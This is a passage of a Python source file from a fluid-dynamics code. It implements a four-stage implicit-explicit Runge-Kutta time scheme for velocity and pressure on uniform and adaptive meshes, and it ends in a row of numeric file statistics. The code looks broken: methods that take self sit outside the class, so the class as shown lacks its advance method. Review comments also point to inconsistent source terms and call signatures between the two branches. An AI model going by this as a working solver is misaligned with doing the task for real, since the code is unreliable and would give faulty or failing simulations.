more variables in our simulation. It then processes the following instance
attributes:
- the three main linear spatial operators, divergence, gradient and
laplacian
- the non linear spatial operator for the advection
- a timestep dt
Creating these attributes at the instantiation allows to have them computed once
and for all of the simulation.
The BaseScheme class also has special methods that are generic, such as:
- a solve method that solves a linear system "Ax = b"
- a next-time method that advances the time of the simulation, based on the
current time and the timestep of the class
- a compute-initial-values method that computes the initial values of the
variables over the entire domain
- etc.
If we feel the need for a specific method while designing a new scheme class, we
ask whether other schemes would need this method. If the answer is yes then we
implement this method in the BaseScheme class, so that we only have to modify it
in a single place.
Each scheme class has special methods to implement its specific
time-advancement. The time-advancement is enforced by the method advance, which
each class must possess, but which is class-specific. This advance method should
act like a mutator: the variables are implemented as scalars in the main module,
and their local state, which their array of values over every mesh of the
domain, is changed by the call to the advance method.
This module implements an implicit-explicit additive Runge-Kutta scheme,
combining the ESDIRK3(2)4L[2] implicit integrator with its explicit ERK
companion (see the IrkScheme and ErkScheme imports below).
"""
import sys, petsc4py
petsc4py.init(sys.argv)
import petsc4py.PETSc as petsc
import mpi4py.MPI as mpi
import numpy as np
import scipy.sparse as sp
from six.moves import range
import importlib
import math
from mrpy.mr_utils import mesh
from mrpy.mr_utils import op
import mrpy.discretization.spatial as sd
from mrpy.discretization.temporal_base import BaseScheme
import mrpy.discretization.ESDIRK3_2I_4L_2_KC as IrkScheme
import mrpy.discretization.ERK_ESDIRK3_2I_4L_2_new as ErkScheme
import config as cfg
class Scheme(BaseScheme):
    """IMEX (implicit-explicit) additive Runge-Kutta time scheme.

    Couples an explicit ERK scheme for the non-stiff part with an implicit
    ESDIRK scheme for the stiff/DAE part; both sub-schemes are instantiated
    here and reused for every timestep.
    """

    def __init__(self, dimension=cfg.dimension, tree_velocity_x=None,
                 tree_velocity_y=None, tree_velocity_z=None, tree_pressure=None,
                 tree_vorticity=None):
        # Forward the variable trees to the BaseScheme constructor; the
        # vorticity tree is only passed along when one was actually given.
        base_kwargs = dict(tree_velocity_x=tree_velocity_x,
                           tree_velocity_y=tree_velocity_y,
                           tree_pressure=tree_pressure)
        if tree_vorticity is not None:
            base_kwargs["tree_vorticity"] = tree_vorticity
        BaseScheme.__init__(self, **base_kwargs)

        # Embedded implicit (ESDIRK) and explicit (ERK) sub-schemes that
        # provide the Butcher coefficients, the stage right-hand sides and
        # the internal Uzawa solver used by advance().
        self.irk = IrkScheme.Scheme(tree_velocity_x=tree_velocity_x,
                                    tree_velocity_y=tree_velocity_y,
                                    tree_pressure=tree_pressure,
                                    tree_vorticity=tree_vorticity)
        self.erk = ErkScheme.Scheme(tree_velocity_x=tree_velocity_x,
                                    tree_velocity_y=tree_velocity_y,
                                    tree_pressure=tree_pressure,
                                    tree_vorticity=tree_vorticity)
def make_operators(self, tree_velocity_x, tree_velocity_y, tree_pressure,
                   tree_density=None):
    """Build all spatial operators needed by this scheme and its sub-schemes.

    Creates the mass/inverse-mass, divergence, advection, laplacian and
    pressure-gradient operators once so they can be reused at every
    timestep, then delegates to the embedded irk/erk schemes so they build
    their own operators as well.

    Parameters:
    - tree_velocity_x, tree_velocity_y: trees carrying the velocity
      components; used as the discretization support of the operators.
    - tree_pressure: tree carrying the pressure.
    - tree_density: only required when self.low_mach is set, for the
      1/density operator.
    """
    self.make_velocity_mass(tree_velocity_x)
    self.make_velocity_inverse_mass(tree_velocity_x)
    if self.low_mach:
        self.make_one_over_density(tree_density)
    self.make_velocity_div_x(tree_velocity_x)
    self.make_velocity_div_y(tree_velocity_y)
    # Fix: the advection operators were previously built twice (a second,
    # redundant pair of make_velocity_adv_x/y calls followed the gradient
    # operators); building them once from the same arguments yields the
    # same operators.
    self.make_velocity_adv_x(tree_velocity_x, tree_velocity_y)
    self.make_velocity_adv_y(tree_velocity_x, tree_velocity_y)
    self.make_velocity_lap_x(tree_velocity_x)
    self.make_velocity_lap_y(tree_velocity_y)
    self.make_pressure_grad_x(tree_pressure)
    self.make_pressure_grad_y(tree_pressure)
    self.make_pressure_divgrad()
    self.irk.make_operators(tree_velocity_x, tree_velocity_y, tree_pressure)
    self.erk.make_operators(tree_velocity_x, tree_velocity_y, tree_pressure)
def make_ksps(self):
    """Create the Krylov solver (KSP) contexts of both embedded schemes."""
    for sub_scheme in (self.irk, self.erk):
        sub_scheme.make_ksps()
def advance(self, v_x=None, v_y=None, v_z=None, p=None, t_ini=0, nsp=None):
    """Advance velocity and pressure by one timestep dt with the 4-stage
    IMEX additive Runge-Kutta scheme.

    The explicit (erk) tableau handles the ODE right-hand sides and the
    implicit (irk, ESDIRK) tableau handles the DAE right-hand sides; each
    implicit stage is solved through irk.uzawa_solver_internal. Acts as a
    mutator: v_x.sc, v_y.sc and p.sc are overwritten with the end-of-step
    state.

    Parameters:
    - v_x, v_y, v_z: velocity components. When self.uniform is True they
      are sd.Scalar instances; otherwise they are trees wrapped into
      sd.Scalar here. v_z is unused in this 2-D implementation.
    - p: pressure, same convention as the velocities.
    - t_ini: time at the start of the step; the source terms are evaluated
      at t_ini + c_i * dt for each stage i.
    - nsp: null space forwarded to the final pressure solve (uniform case).
    """
    # Source-term right-hand sides. First index: equation (1 = x-momentum,
    # 2 = y-momentum, 3 = continuity); second index: stage number. They
    # stay None when the corresponding source-term flag is off.
    st_rhs_12 = None
    st_rhs_13 = None
    st_rhs_14 = None
    st_rhs_22 = None
    st_rhs_23 = None
    st_rhs_24 = None
    st_rhs_32 = None
    st_rhs_33 = None
    st_rhs_34 = None

    if self.uniform: #v_x, v_y, etc are scalars, and we just advance them
        # Evaluate each source term at the stage times c2, c3, c4 (stage 1
        # of an ESDIRK scheme reuses the initial state, so no c1 term).
        if self.st_flag_vx:
            mesh.listing_of_leaves(self.st_tree_vx)
            self.compute_source_term(self.st_tree_vx, self.st_func_vx,
                                     t_ini + self.irk.C_coefs["c2"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vx)
            st_rhs_12 = sd.Scalar(self.st_tree_vx)
            self.compute_source_term(self.st_tree_vx, self.st_func_vx,
                                     t_ini + self.irk.C_coefs["c3"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vx)
            st_rhs_13 = sd.Scalar(self.st_tree_vx)
            self.compute_source_term(self.st_tree_vx, self.st_func_vx,
                                     t_ini + self.irk.C_coefs["c4"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vx)
            st_rhs_14 = sd.Scalar(self.st_tree_vx)
        if self.st_flag_vy:
            mesh.listing_of_leaves(self.st_tree_vy)
            self.compute_source_term(self.st_tree_vy, self.st_func_vy,
                                     t_ini + self.irk.C_coefs["c2"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vy)
            st_rhs_22 = sd.Scalar(self.st_tree_vy)
            self.compute_source_term(self.st_tree_vy, self.st_func_vy,
                                     t_ini + self.irk.C_coefs["c3"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vy)
            st_rhs_23 = sd.Scalar(self.st_tree_vy)
            self.compute_source_term(self.st_tree_vy, self.st_func_vy,
                                     t_ini + self.irk.C_coefs["c4"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vy)
            st_rhs_24 = sd.Scalar(self.st_tree_vy)
        if self.st_flag_vc:
            mesh.listing_of_leaves(self.st_tree_vc)
            self.compute_source_term(self.st_tree_vc, self.st_func_vc,
                                     t_ini + self.irk.C_coefs["c2"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vc)
            st_rhs_32 = sd.Scalar(self.st_tree_vc)
            self.compute_source_term(self.st_tree_vc, self.st_func_vc,
                                     t_ini + self.irk.C_coefs["c3"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vc)
            st_rhs_33 = sd.Scalar(self.st_tree_vc)
            self.compute_source_term(self.st_tree_vc, self.st_func_vc,
                                     t_ini + self.irk.C_coefs["c4"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vc)
            st_rhs_34 = sd.Scalar(self.st_tree_vc)

        # Stage 1: g_*1 is simply the state at t_ini (ESDIRK first stage).
        # g_1i / g_2i / g_3i hold stage values of v_x / v_y / p.
        g_11, g_21, g_31 = sd.Scalar(), sd.Scalar(), sd.Scalar()
        g_11.sc, g_21.sc, g_31.sc = v_x.sc.copy(), v_y.sc.copy(), p.sc.copy()
        print("stage 1 done")
        print("")

        # Stage 2: initial guess is the stage-1 state; rhs combines the
        # mass term, the explicit a21 ODE term and the implicit a21 DAE term.
        g_12, g_22, g_32 = sd.Scalar(), sd.Scalar(), sd.Scalar()
        g_12.sc, g_22.sc, g_32.sc = g_11.sc.copy(), g_21.sc.copy(), g_31.sc.copy()
        rhs_momentum_x = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_x)),
            sd.mul_num_scalar(self.erk.A_coefs["a21"],
                              self.erk.make_rhs_ode_x(g_11, g_21)),
            sd.mul_num_scalar(self.irk.A_coefs["a21"], self.irk.make_rhs_dae_x(g_11,
                              g_31, st_rhs_12)))
        rhs_momentum_y = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_y)),
            sd.mul_num_scalar(self.erk.A_coefs["a21"],
                              self.erk.make_rhs_ode_y(g_11, g_21)),
            sd.mul_num_scalar(self.irk.A_coefs["a21"], self.irk.make_rhs_dae_y(g_21,
                              g_31, st_rhs_22)))
        self.irk.uzawa_solver_internal("2", velocity_x=g_12, velocity_y=g_22,
                                       pressure=g_32, rhs_momentum_x=rhs_momentum_x,
                                       rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_32)
        print("stage 2 done")
        print("")

        # Stage 3: explicit terms a31/a32, implicit terms a31/a32.
        # NOTE(review): both DAE terms use the stage-3 source term
        # (st_rhs_13 / st_rhs_23) rather than the one of their own stage —
        # confirm this is intended by the tableau.
        g_13, g_23, g_33 = sd.Scalar(), sd.Scalar(), sd.Scalar()
        g_13.sc, g_23.sc, g_33.sc = g_12.sc.copy(), g_22.sc.copy(), g_32.sc.copy()
        rhs_momentum_x = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_x)),
            sd.mul_num_scalar(self.erk.A_coefs["a31"],
                              self.erk.make_rhs_ode_x(g_11, g_21)),
            sd.mul_num_scalar(self.erk.A_coefs["a32"],
                              self.erk.make_rhs_ode_x(g_12, g_22)),
            sd.mul_num_scalar(self.irk.A_coefs["a31"], self.irk.make_rhs_dae_x(g_11,
                              g_31, st_rhs_13)),
            sd.mul_num_scalar(self.irk.A_coefs["a32"], self.irk.make_rhs_dae_x(g_12,
                              g_32, st_rhs_13)))
        rhs_momentum_y = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_y)),
            sd.mul_num_scalar(self.erk.A_coefs["a31"],
                              self.erk.make_rhs_ode_y(g_11, g_21)),
            sd.mul_num_scalar(self.erk.A_coefs["a32"],
                              self.erk.make_rhs_ode_y(g_12, g_22)),
            sd.mul_num_scalar(self.irk.A_coefs["a31"], self.irk.make_rhs_dae_y(g_21,
                              g_31, st_rhs_23)),
            sd.mul_num_scalar(self.irk.A_coefs["a32"], self.irk.make_rhs_dae_y(g_22,
                              g_32, st_rhs_23)))
        self.irk.uzawa_solver_internal("3", velocity_x=g_13, velocity_y=g_23,
                                       pressure=g_33, rhs_momentum_x=rhs_momentum_x,
                                       rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_33)
        print("stage 3 done")
        print("")
        #quit()

        # Stage 4: explicit terms a41/a42/a43, implicit terms a41/a42/a43.
        g_14, g_24, g_34 = sd.Scalar(), sd.Scalar(), sd.Scalar()
        g_14.sc, g_24.sc, g_34.sc = g_13.sc.copy(), g_23.sc.copy(), g_33.sc.copy()
        rhs_momentum_x = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_x)),
            sd.mul_num_scalar(self.erk.A_coefs["a41"],
                              self.erk.make_rhs_ode_x(g_11, g_21)),
            sd.mul_num_scalar(self.erk.A_coefs["a42"],
                              self.erk.make_rhs_ode_x(g_12, g_22)),
            sd.mul_num_scalar(self.erk.A_coefs["a43"],
                              self.erk.make_rhs_ode_x(g_13, g_23)),
            sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_x(g_11,
                              g_31, st_rhs_14)),
            sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_x(g_12,
                              g_32, st_rhs_14)),
            sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_x(g_13,
                              g_33, st_rhs_14)))
        rhs_momentum_y = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_y)),
            sd.mul_num_scalar(self.erk.A_coefs["a41"],
                              self.erk.make_rhs_ode_y(g_11, g_21)),
            sd.mul_num_scalar(self.erk.A_coefs["a42"],
                              self.erk.make_rhs_ode_y(g_12, g_22)),
            sd.mul_num_scalar(self.erk.A_coefs["a43"],
                              self.erk.make_rhs_ode_y(g_13, g_23)),
            sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_y(g_21,
                              g_31, st_rhs_24)),
            sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_y(g_22,
                              g_32, st_rhs_24)),
            sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_y(g_23,
                              g_33, st_rhs_24)))
        self.irk.uzawa_solver_internal("4", velocity_x=g_14, velocity_y=g_24,
                                       pressure=g_34, rhs_momentum_x=rhs_momentum_x,
                                       rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_34)
        print("stage 4 done")
        print("")

        # Kept for reference: an alternative final stage solved through the
        # Uzawa solver instead of the explicit recombination below.
        #g_1f, g_2f, g_3f = sd.Scalar(), sd.Scalar(), sd.Scalar()
        #g_1f.sc, g_2f.sc, g_3f.sc = g_14.sc.copy(), g_24.sc.copy(), g_34.sc.copy()
        #rhs_momentum_x = sd.add_scalars(
        #    sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_x)),
        #    sd.mul_num_scalar(self.erk.B_coefs["b1"],
        #                      self.erk.make_rhs_ode_x(g_11, g_21)),
        #    sd.mul_num_scalar(self.erk.B_coefs["b2"],
        #                      self.erk.make_rhs_ode_x(g_12, g_22)),
        #    sd.mul_num_scalar(self.erk.B_coefs["b3"],
        #                      self.erk.make_rhs_ode_x(g_13, g_23)),
        #    sd.mul_num_scalar(self.erk.B_coefs["b4"],
        #                      self.erk.make_rhs_ode_x(g_14, g_24)),
        #    sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_x(g_11,
        #                      g_31, st_rhs_14)),
        #    sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_x(g_12,
        #                      g_32, st_rhs_14)),
        #    sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_x(g_13,
        #                      g_33, st_rhs_14)))
        #rhs_momentum_y = sd.add_scalars(
        #    sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(v_y)),
        #    sd.mul_num_scalar(self.erk.B_coefs["b1"],
        #                      self.erk.make_rhs_ode_y(g_11, g_21)),
        #    sd.mul_num_scalar(self.erk.B_coefs["b2"],
        #                      self.erk.make_rhs_ode_y(g_12, g_22)),
        #    sd.mul_num_scalar(self.erk.B_coefs["b3"],
        #                      self.erk.make_rhs_ode_y(g_13, g_23)),
        #    sd.mul_num_scalar(self.erk.B_coefs["b4"],
        #                      self.erk.make_rhs_ode_y(g_14, g_24)),
        #    sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_y(g_21,
        #                      g_31, st_rhs_24)),
        #    sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_y(g_22,
        #                      g_32, st_rhs_24)),
        #    sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_y(g_23,
        #                      g_33, st_rhs_24)))
        #self.irk.uzawa_solver_internal("4", velocity_x=g_1f, velocity_y=g_2f,
        #                               pressure=g_3f, rhs_momentum_x=rhs_momentum_x,
        #                               rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_34)
        #print("final stage done")
        #print("")

        # Final recombination: v^{n+1} = v^n + dt * M^{-1} * sum of the
        # explicit b_i weighted ODE terms and the implicit a4* weighted DAE
        # terms (stage-4 row; presumably the ESDIRK tableau is stiffly
        # accurate, i.e. b_i = a_4i — TODO confirm).
        # NOTE(review): g_1f/g_2f are immediately rebound below and g_3f is
        # never used — the sd.Scalar() pre-allocations look redundant.
        g_1f, g_2f, g_3f = sd.Scalar(), sd.Scalar(), sd.Scalar()
        #g_1f.sc, g_2f.sc, g_3f.sc = g_14.sc.copy(), g_24.sc.copy(), g_34.sc.copy()
        g_1f = sd.add_scalars(
            v_x,
            self.velocity_inverse_mass.apply(
                sd.mul_num_scalar(self.dt, sd.add_scalars(
                    sd.mul_num_scalar(self.erk.B_coefs["b1"],
                                      self.erk.make_rhs_ode_x(g_11, g_21)),
                    sd.mul_num_scalar(self.erk.B_coefs["b2"],
                                      self.erk.make_rhs_ode_x(g_12, g_22)),
                    sd.mul_num_scalar(self.erk.B_coefs["b3"],
                                      self.erk.make_rhs_ode_x(g_13, g_23)),
                    sd.mul_num_scalar(self.erk.B_coefs["b4"],
                                      self.erk.make_rhs_ode_x(g_14, g_24)),
                    sd.mul_num_scalar(self.irk.A_coefs["a41"],
                                      self.irk.make_rhs_dae_x(g_11,
                                      g_31, st_rhs_14)),
                    sd.mul_num_scalar(self.irk.A_coefs["a42"],
                                      self.irk.make_rhs_dae_x(g_12,
                                      g_32, st_rhs_14)),
                    sd.mul_num_scalar(self.irk.A_coefs["a43"],
                                      self.irk.make_rhs_dae_x(g_13,
                                      g_33, st_rhs_14)),
                    sd.mul_num_scalar(self.irk.A_coefs["a44"],
                                      self.irk.make_rhs_dae_x(g_14,
                                      g_34, st_rhs_14))))))
        g_2f = sd.add_scalars(
            v_y,
            self.velocity_inverse_mass.apply(
                sd.mul_num_scalar(self.dt, sd.add_scalars(
                    sd.mul_num_scalar(self.erk.B_coefs["b1"],
                                      self.erk.make_rhs_ode_y(g_11, g_21)),
                    sd.mul_num_scalar(self.erk.B_coefs["b2"],
                                      self.erk.make_rhs_ode_y(g_12, g_22)),
                    sd.mul_num_scalar(self.erk.B_coefs["b3"],
                                      self.erk.make_rhs_ode_y(g_13, g_23)),
                    sd.mul_num_scalar(self.erk.B_coefs["b4"],
                                      self.erk.make_rhs_ode_y(g_14, g_24)),
                    sd.mul_num_scalar(self.irk.A_coefs["a41"],
                                      self.irk.make_rhs_dae_y(g_21,
                                      g_31, st_rhs_24)),
                    sd.mul_num_scalar(self.irk.A_coefs["a42"],
                                      self.irk.make_rhs_dae_y(g_22,
                                      g_32, st_rhs_24)),
                    sd.mul_num_scalar(self.irk.A_coefs["a43"],
                                      self.irk.make_rhs_dae_y(g_23,
                                      g_33, st_rhs_24)),
                    sd.mul_num_scalar(self.irk.A_coefs["a44"],
                                      self.irk.make_rhs_dae_y(g_24,
                                      g_34, st_rhs_24))))))
        print("final stage done")
        print("")

        # Mutate the caller's variables with the end-of-step state; the
        # pressure is first taken from stage 4, then recomputed below.
        #v_x.sc, v_y.sc, p.sc = g_14.sc.copy(), g_24.sc.copy(), g_34.sc.copy()
        v_x.sc, v_y.sc, p.sc = g_1f.sc.copy(), g_2f.sc.copy(), g_34.sc.copy()
        # Do we need to recompute the right pressure?
        # The pressure must be the right Lagrange multiplier of the
        # resulting velocity
        p.sc = self.solve(self.pressure_divgrad,
                          self.make_rhs_pressure_equation(v_x, v_y,
                          st_rhs_14, st_rhs_24), nsp).sc
    else: #v_x, etc are trees
        # Adaptive case: wrap the trees into Scalars, and re-grade/prune
        # the source-term trees so they match the variables' meshes.
        velocity_x = sd.Scalar(v_x)
        velocity_y = sd.Scalar(v_y)
        pressure = sd.Scalar(p)
        if self.st_flag_vx: #we need to put the st_tree_vx to the same grading as v_x
            op.set_to_same_grading(v_x, self.st_tree_vx)
            op.run_pruning(self.st_tree_vx)
            mesh.listing_of_leaves(self.st_tree_vx)
            self.compute_source_term(self.st_tree_vx, self.st_func_vx,
                                     t_ini + self.irk.C_coefs["c2"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vx)
            st_rhs_12 = sd.Scalar(self.st_tree_vx)
            self.compute_source_term(self.st_tree_vx, self.st_func_vx,
                                     t_ini + self.irk.C_coefs["c3"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vx)
            st_rhs_13 = sd.Scalar(self.st_tree_vx)
            self.compute_source_term(self.st_tree_vx, self.st_func_vx,
                                     t_ini + self.irk.C_coefs["c4"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vx)
            st_rhs_14 = sd.Scalar(self.st_tree_vx)
        if self.st_flag_vy: #we need to put the st_tree_vy to the same grading as v_y
            op.set_to_same_grading(v_y, self.st_tree_vy)
            op.run_pruning(self.st_tree_vy)
            mesh.listing_of_leaves(self.st_tree_vy)
            self.compute_source_term(self.st_tree_vy, self.st_func_vy,
                                     t_ini + self.irk.C_coefs["c2"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vy)
            st_rhs_22 = sd.Scalar(self.st_tree_vy)
            self.compute_source_term(self.st_tree_vy, self.st_func_vy,
                                     t_ini + self.irk.C_coefs["c3"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vy)
            st_rhs_23 = sd.Scalar(self.st_tree_vy)
            self.compute_source_term(self.st_tree_vy, self.st_func_vy,
                                     t_ini + self.irk.C_coefs["c4"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vy)
            st_rhs_24 = sd.Scalar(self.st_tree_vy)
        # we need to put the st_tree_vc to the same grading as the velocity
        # NOTE(review): this grades st_tree_vc against v_x — confirm that
        # the continuity source term is meant to follow the x-velocity mesh.
        if self.st_flag_vc:
            op.set_to_same_grading(v_x, self.st_tree_vc)
            op.run_pruning(self.st_tree_vc)
            mesh.listing_of_leaves(self.st_tree_vc)
            self.compute_source_term(self.st_tree_vc, self.st_func_vc,
                                     t_ini + self.irk.C_coefs["c2"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vc)
            st_rhs_32 = sd.Scalar(self.st_tree_vc)
            self.compute_source_term(self.st_tree_vc, self.st_func_vc,
                                     t_ini + self.irk.C_coefs["c3"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vc)
            st_rhs_33 = sd.Scalar(self.st_tree_vc)
            self.compute_source_term(self.st_tree_vc, self.st_func_vc,
                                     t_ini + self.irk.C_coefs["c4"]*self.dt)
            #mesh.listing_of_leaves(self.st_tree_vc)
            st_rhs_34 = sd.Scalar(self.st_tree_vc)

        # Stage 1: state at t_ini.
        g_11, g_21, g_31 = sd.Scalar(), sd.Scalar(), sd.Scalar()
        g_11.sc, g_21.sc, g_31.sc = velocity_x.sc.copy(), \
            velocity_y.sc.copy(), pressure.sc.copy()
        print("stage 1 done")
        print("")

        # Stage 2 (same structure as the uniform branch).
        g_12, g_22, g_32 = sd.Scalar(), sd.Scalar(), sd.Scalar()
        g_12.sc, g_22.sc, g_32.sc = g_11.sc.copy(), g_21.sc.copy(), g_31.sc.copy()
        rhs_momentum_x = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_x)),
            sd.mul_num_scalar(self.erk.A_coefs["a21"],
                              self.erk.make_rhs_ode_x(g_11, g_21)),
            sd.mul_num_scalar(self.irk.A_coefs["a21"], self.irk.make_rhs_dae_x(g_11,
                              g_31, st_rhs_12)))
        rhs_momentum_y = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_y)),
            sd.mul_num_scalar(self.erk.A_coefs["a21"],
                              self.erk.make_rhs_ode_y(g_11, g_21)),
            sd.mul_num_scalar(self.irk.A_coefs["a21"], self.irk.make_rhs_dae_y(g_21,
                              g_31, st_rhs_22)))
        self.irk.uzawa_solver_internal("2", velocity_x=g_12, velocity_y=g_22,
                                       pressure=g_32, rhs_momentum_x=rhs_momentum_x,
                                       rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_32)
        print("stage 2 done")
        print("")

        # Stage 3.
        g_13, g_23, g_33 = sd.Scalar(), sd.Scalar(), sd.Scalar()
        g_13.sc, g_23.sc, g_33.sc = g_12.sc.copy(), g_22.sc.copy(), g_32.sc.copy()
        rhs_momentum_x = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_x)),
            sd.mul_num_scalar(self.erk.A_coefs["a31"],
                              self.erk.make_rhs_ode_x(g_11, g_21)),
            sd.mul_num_scalar(self.erk.A_coefs["a32"],
                              self.erk.make_rhs_ode_x(g_12, g_22)),
            sd.mul_num_scalar(self.irk.A_coefs["a31"], self.irk.make_rhs_dae_x(g_11,
                              g_31, st_rhs_13)),
            sd.mul_num_scalar(self.irk.A_coefs["a32"], self.irk.make_rhs_dae_x(g_12,
                              g_32, st_rhs_13)))
        rhs_momentum_y = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_y)),
            sd.mul_num_scalar(self.erk.A_coefs["a31"],
                              self.erk.make_rhs_ode_y(g_11, g_21)),
            sd.mul_num_scalar(self.erk.A_coefs["a32"],
                              self.erk.make_rhs_ode_y(g_12, g_22)),
            sd.mul_num_scalar(self.irk.A_coefs["a31"], self.irk.make_rhs_dae_y(g_21,
                              g_31, st_rhs_23)),
            sd.mul_num_scalar(self.irk.A_coefs["a32"], self.irk.make_rhs_dae_y(g_22,
                              g_32, st_rhs_23)))
        self.irk.uzawa_solver_internal("3", velocity_x=g_13, velocity_y=g_23,
                                       pressure=g_33, rhs_momentum_x=rhs_momentum_x,
                                       rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_33)
        print("stage 3 done")
        print("")

        # Stage 4.
        # NOTE(review): unlike the uniform branch, make_rhs_ode_x/y here
        # receives a third (source-term) argument — confirm the ERK
        # signature and which branch is the intended one.
        g_14, g_24, g_34 = sd.Scalar(), sd.Scalar(), sd.Scalar()
        g_14.sc, g_24.sc, g_34.sc = g_13.sc.copy(), g_23.sc.copy(), g_33.sc.copy()
        rhs_momentum_x = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_x)),
            sd.mul_num_scalar(self.erk.A_coefs["a41"],
                              self.erk.make_rhs_ode_x(g_11, g_21, st_rhs_14)),
            sd.mul_num_scalar(self.erk.A_coefs["a42"],
                              self.erk.make_rhs_ode_x(g_12, g_22, st_rhs_14)),
            sd.mul_num_scalar(self.erk.A_coefs["a43"],
                              self.erk.make_rhs_ode_x(g_13, g_23, st_rhs_14)),
            sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_x(g_11,
                              g_31, st_rhs_14)),
            sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_x(g_12,
                              g_32, st_rhs_14)),
            sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_x(g_13,
                              g_33, st_rhs_14)))
        rhs_momentum_y = sd.add_scalars(
            sd.mul_num_scalar(1/self.dt, self.irk.velocity_mass.apply(velocity_y)),
            sd.mul_num_scalar(self.erk.A_coefs["a41"],
                              self.erk.make_rhs_ode_y(g_11, g_21, st_rhs_24)),
            sd.mul_num_scalar(self.erk.A_coefs["a42"],
                              self.erk.make_rhs_ode_y(g_12, g_22, st_rhs_24)),
            sd.mul_num_scalar(self.erk.A_coefs["a43"],
                              self.erk.make_rhs_ode_y(g_13, g_23, st_rhs_24)),
            sd.mul_num_scalar(self.irk.A_coefs["a41"], self.irk.make_rhs_dae_y(g_21,
                              g_31, st_rhs_24)),
            sd.mul_num_scalar(self.irk.A_coefs["a42"], self.irk.make_rhs_dae_y(g_22,
                              g_32, st_rhs_24)),
            sd.mul_num_scalar(self.irk.A_coefs["a43"], self.irk.make_rhs_dae_y(g_23,
                              g_33, st_rhs_24)))
        self.irk.uzawa_solver_internal("4", velocity_x=g_14, velocity_y=g_24,
                                       pressure=g_34, rhs_momentum_x=rhs_momentum_x,
                                       rhs_momentum_y=rhs_momentum_y, rhs_continuity=st_rhs_34)
        print("stage 4 done")
        print("")

        # Stage 4 is taken as the end-of-step state (no explicit b-weight
        # recombination in this branch), then written back into the trees.
        velocity_x.sc, velocity_y.sc, pressure.sc = g_14.sc.copy(), g_24.sc.copy(), g_34.sc.copy()
        # Do we need to recompute the right pressure?
        self.scalar_to_tree(velocity_x, v_x)
        self.scalar_to_tree(velocity_y, v_y)
        self.scalar_to_tree(pressure, p)
| 51.373162 | 102 | 0.595305 | 4,439 | 27,947 | 3.377563 | 0.072088 | 0.055092 | 0.050157 | 0.087774 | 0.764757 | 0.754752 | 0.744014 | 0.737544 | 0.73501 | 0.733075 | 0 | 0.045013 | 0.29649 | 27,947 | 543 | 103 | 51.467772 | 0.717563 | 0.11189 | 0 | 0.73262 | 0 | 0 | 0.015212 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010695 | false | 0 | 0.042781 | 0 | 0.05615 | 0.050802 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
